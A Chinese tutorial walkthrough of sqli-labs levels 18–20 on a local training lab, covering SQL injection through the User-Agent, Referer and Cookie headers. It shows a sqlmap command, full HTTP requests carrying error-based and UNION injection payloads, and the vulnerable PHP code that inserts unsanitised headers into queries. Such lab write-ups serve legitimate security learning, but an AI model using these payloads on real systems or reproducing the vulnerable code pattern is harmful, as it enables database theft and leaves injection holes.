这几关的注入点产生位置大多在HTTP头位置处

常见的HTTP注入点产生位置为【Referer】、【X-Forwarded-For】、【Cookie】、【X-Real-IP】、【Accept-Language】、【Authorization】;

  • Less-18 Header Injection- Error Based- string

1)工具用法: 
注入点在user-agent处,所以使用sqlmap -r参数就可以了,将请求的测试数据包保存成1.txt,然后在user-agent字段处加个*号。然后输入下列命令就可以使用工具注入

    • sqlmap -r 1.txt –current-db –threads 10 –batch –technique BEST

测试数据包 1.txt

POST /hacker/sqli-labs-master/Less-18/index.php HTTP/1.1

Host: 127.0.0.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0*

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: http://127.0.0.1/hacker/sqli-labs-master/Less-18/index.php

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 38

uname=admin&passwd=admin&submit=Submit

  

2)手工注入 
前面的字段前篇一律,只要有错误回显得话,匹配好单引号可以直接使用updatexml爆错语句验证注入点;

POST /hacker/sqli-labs-master/Less-18/index.php HTTP/1.1

Host: 127.0.0.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0' and updatexml(1,concat(0x7e,database()),1) and '11'='11

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: http://127.0.0.1/hacker/sqli-labs-master/Less-18/index.php

Connection: close

Cache-Control: max-age=0

Content-Type: application/x-www-form-urlencoded

Content-Length: 38

uname=admin&passwd=admin&submit=Submit

  

3)注入点产生代码

//检查值是否为空,不为空使用mysql_real_escape_string函数对输入的值进行过滤

function check_input($value) {

    if (!empty($value)) {

        // truncation (see comments)

        $value = substr($value, 0, 20);

    }

    // Stripslashes if magic quotes enabled

    if (get_magic_quotes_gpc()) {

        $value = stripslashes($value);

    }

    // Quote if not a number

    if (!ctype_digit($value)) {

        $value = "'".mysql_real_escape_string($value)."'";

    } else {

        $value = intval($value);

    }

    return $value;

}

$uagent = $_SERVER['HTTP_USER_AGENT'];

$IP = $_SERVER['REMOTE_ADDR'];

echo "<br>";

echo 'Your IP ADDRESS is: '.$IP;

echo "<br>";

//echo 'Your User Agent is: ' .$uagent;

// take the variables

if (isset($_POST['uname']) && isset($_POST['passwd'])) {

    $uname = check_input($_POST['uname']);

    $passwd = check_input($_POST['passwd']);

    //logging the connection parameters to a file for analysis.

    $fp = fopen('result.txt', 'a');

    fwrite($fp, 'User Agent:'.$uname."\n");

    fclose($fp);

    $sql = "SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";

    $result1 = mysql_query($sql);

    $row1 = mysql_fetch_array($result1);

    if ($row1) {

        echo '<font color= "#FFFF00" font size = 3 >';

        $insert = "INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)"; //注入点产生位置

        mysql_query($insert);

 

-Less-19 Header Injection- Referer- Error Based- string

这一关的注入点产生在referer处,主要为用insert语句写入时未判断。。

Referer:' AND (SELECT 1690 FROM(SELECT COUNT(*),CONCAT(0x716a707171,(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,54)),0x717a767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'qmQA'='qmQA

Playload

所使用的注入语句

完整的HTTP请求包

POST /sqli-labs-master/Less-19/ HTTP/1.1

Host: 127.0.0.1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: http://127.0.0.1/sqli-labs-master/Less-19/' and updatexml(1,concat(0x7e,database(),0x7e),1) and '1'='1

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 38

uname=admin&passwd=admin&submit=Submit

  

核心代码

function check_input($value) {

    if (!empty($value)) {

        // truncation (see comments)

        $value = substr($value, 0, 20);

    }

    // Stripslashes if magic quotes enabled

    if (get_magic_quotes_gpc()) {

        $value = stripslashes($value);

    }

    // Quote if not a number

    if (!ctype_digit($value)) {

        $value = "'".mysql_real_escape_string($value)."'";

    } else {

        $value = intval($value);

    }

    return $value;

}

$uagent = $_SERVER['HTTP_REFERER'];

$IP = $_SERVER['REMOTE_ADDR'];

echo "<br>";

echo 'Your IP ADDRESS is: '.$IP;

echo "<br>";

//echo 'Your User Agent is: ' .$uagent;

// take the variables

if (isset($_POST['uname']) && isset($_POST['passwd'])) {

    $uname = check_input($_POST['uname']);

    $passwd = check_input($_POST['passwd']);

    $fp = fopen('result.txt', 'a');

    fwrite($fp, 'Referer:'.$uname."\n");

    fclose($fp);

    $sql = "SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";

    $result1 = mysql_query($sql);

    $row1 = mysql_fetch_array($result1);

    if ($row1) {

        echo '<font color= "#FFFF00" font size = 3 >';

        $insert = "INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')"; //注入点产生处

        mysql_query($insert);

  

-Less-20 Cookie Injection- Error Based- string 
Playload

Cookie:Dumb-4829' UNION ALL SELECT NULL,CONCAT(0x7170786271,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x7176706271),NULL-- -

  

核心代码

1、接收用户名,密码;

2、如果正确,设定用户名作为cookies值

3、查询数据库中有没有相关的用户名等于cookies名

144-147行代码

$cookee = base64_decode($cookee);

echo "<br></font>";

$sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";

$result=mysql_query($sql);

...

188-189代码

echo " Your Cookie is deleted";

setcookie('uname', base64_encode($row1['username']), time()-3600);

  

【Mysql sql inject】【入门篇】sqli-labs使用 part 4【18-20】的更多相关文章

  1. 【Mysql sql inject】【入门篇】SQLi-Labs使用 part 2【12-14】

    这几关主要是考察POST形式的SQLi注入闭合 ## Less-12 - POST - Error Based- Double quotes- String ### 1)知识点 主要考察报错注入中的双 ...

  2. 【Mysql sql inject】【入门篇】SQLi-Labs使用 part 1【01-11】

    人员流动性过大一直是乙方公司痛点.虽然试用期间都有岗前学习,但老员工忙于项目无暇带新人成长,入职新人的学习基本靠自己不断摸索.期望看相关文档就可以一蹴而是不现实的.而按部就班的学习又很难短期内将知识有 ...

  3. 【Mysql sql inject】【入门篇】sqli-labs使用 part 3【15-17】

      Less-15- Blind- Boolian Based- String 1)工具用法: sqlmap -u --batch --technique BEST 2)手工注入 时间盲注放弃用手工了 ...

  4. 【Mysql sql inject】POST方法BASE64编码注入write-up

      翻到群里的小伙伴发出一道POST型SQL注入题,简单抓包判断出题目需要base64编码后才执行sql语句,为学习下SQL注入出题与闯关的思路+工作不是很忙,所以花点时间玩了一下,哈哈哈哈哈哈哈哈哈 ...

  5. SQL注入系列:SQLi Labs

    前言 关于注释 说明:在SQL中--[空格]表示注释,但是在URL中--空格在发送请求的时候会把最后的空格去掉,所以用--+代替,因为+在被URL编码后会变成空格 MYSQL有三种常用注释: --[空 ...

  6. [转]sql语句中出现笛卡尔乘积 SQL查询入门篇

    本篇文章中,主要说明SQL中的各种连接以及使用范围,以及更进一步的解释关系代数法和关系演算法对在同一条查询的不同思路. 多表连接简介 在关系数据库中,一个查询往往会涉及多个表,因为很少有数据库只有一个 ...

  7. sql语句中出现笛卡尔乘积 SQL查询入门篇

    2014-12-29  凡尘工作室   阅 34985  转 95 本篇文章中,主要说明SQL中的各种连接以及使用范围,以及更进一步的解释关系代数法和关系演算法对在同一条查询的不同思路. 多表连接简介 ...

  8. MySQL:数据库入门篇4

    1. 视图 创建视图 create view 视图名字 as 查询sql语句; drop view 视图名字; alter view 视图名字 as 查询sql语句; 2. 触发器 1. 插入事件触发 ...

  9. MySQL:数据库入门篇1

    1,什么是数据库?——存储数据的仓库 数据库技术是计算机应用领域中非常重要的技术,它产生于20世纪60年代末,是数据管理的最新技术,也是软件技术的一个重要分支. 简单的说,数据库就是一个存放数据的仓库 ...

随机推荐

  1. [luogu3258][JLOI2014]松鼠的新家

    题解 我们就在\([a_i,a_{i+1}]\)的路径上都\(+1\),然后单点查询就可以了. ac代码(吸了氧才过的QwQ) # include <bits/stdc++.h> # de ...

  2. can总线的示波器检测方法

    stm32的can总线是在APB1上的,stm32f10x的主频是72Mhz,can外设时钟是36Mhz,stm32f2xx的主频是120Mhz,can外设时钟是30Mhz... STM32 APB1 ...

  3. 部署kubernetes1.8.4+contiv高可用集群

    原理和架构图参考上一篇,这里只记录操作步骤.由于东西较多,篇幅也会较长. etcd version: 3.2.11 kube version: 1.8.4 contiv version: 1.1.7 ...

  4. 包学会之浅入浅出Vue.js:结业篇(转)

    蔡述雄,现腾讯用户体验设计部QQ空间高级UI工程师.智图图片优化系统首席工程师,曾参与<众妙之门>书籍的翻译工作.目前专注前端图片优化与新技术的探研. 在第一篇<包学会之浅入浅出Vu ...

  5. Qt shortcuts

    ESC 切换到代码编辑模式 F1   查看帮助 F4    .h 与 .c or .cpp之间切换 shift + F2 声明与定义间切换 Ctrl + tab 切换已打开的文件 Ctrl + B 编 ...

  6. Docker:使用Jenkins构建Docker镜像

    Docker  彭东稳  1年前 (2016-12-27)  10709次浏览  已收录  0个评论 一.介绍Jenkins Jenkins是一个开源项目,提供了一种易于使用的持续集成系统,使开发者从 ...

  7. Python Machine Learning-Chapter4

    Chapter4 Building Good Training Sets – Data Preprocessing 4.1 Dealing with missing data 如何判断数据框内的数据是 ...

  8. 离线方式部署Ambari2.6.0.0

    Hadoop生态圈-离线方式部署Ambari2.6.0.0 作者:尹正杰 版权声明:原创作品,谢绝转载!否则将追究法律责任. 我现在所在的公司用的是CDH管理Hadoop集群,前端时间去面试时发现很多 ...

  9. H3C交换机端口安全技术之端口隔离的应用

    H3C交换机端口安全技术---端口隔离的应用 相信大家所在公司都会有财务部门,普通员工和领导,网络工程师在配置的时候为了安全考虑,会用一些硬件上自身支持的功能区做一些安全措施.为了方便说明需求,我特意 ...

  10. JS文本框获取焦点

    所谓焦点,就是鼠标移上文本框的时候那个一闪一闪的光标.